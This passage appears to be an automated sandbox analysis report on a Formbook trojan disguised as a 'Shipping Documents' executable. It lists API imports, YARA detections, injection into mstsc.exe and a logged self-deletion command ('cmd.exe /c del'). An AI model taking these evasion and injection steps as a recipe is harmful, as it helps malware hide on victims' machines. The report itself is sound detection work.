Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AFB040 NtSuspendThread,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe | Code function: 2_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AFA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04829770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489E10 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489E90 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00489D5A NtCreateFile,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00406925
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041E853
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041D07C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041E00E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041EA8B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409E40
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409E3C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B820A8
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB090
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71002
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABF900
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B822AE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEEBB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7DBD2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82B28
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC841F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B825DD
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB0D20
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82D07
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81D55
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B82EF7
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD6E30
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04806E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048D07C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048E00E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472D87
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00479E40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00479E3C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00472FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 047EB150 appears 35 times
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: String function: 00ABB150 appears 35 times
          Source: 202139769574 Shipping Documents.exe, 00000001.00000003.646094416.000000000334F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exe, 00000002.00000002.701116428.0000000000BAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exe, 00000002.00000002.702183379.0000000002823000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs 202139769574 Shipping Documents.exe
          Source: 202139769574 Shipping Documents.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@3/2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3984:120:WilError_01
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile created: C:\Users\user\AppData\Local\Temp\nseCE56.tmp
          Source: 202139769574 Shipping Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: 202139769574 Shipping Documents.exeVirustotal: Detection: 33%
          Source: 202139769574 Shipping Documents.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile read: C:\Users\user\Desktop\202139769574 Shipping Documents.exe
          Source: unknownProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: 202139769574 Shipping Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 202139769574 Shipping Documents.exe, 00000001.00000003.646868549.0000000003230000.00000004.00000001.sdmp, 202139769574 Shipping Documents.exe, 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, mstsc.exe, 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 202139769574 Shipping Documents.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Unpacked PE file: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00416950 push eax; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_0041C167 push ebp; iretd
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00417237 push es; retf
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exe Code function: 2_2_00416BCC push cs; retf
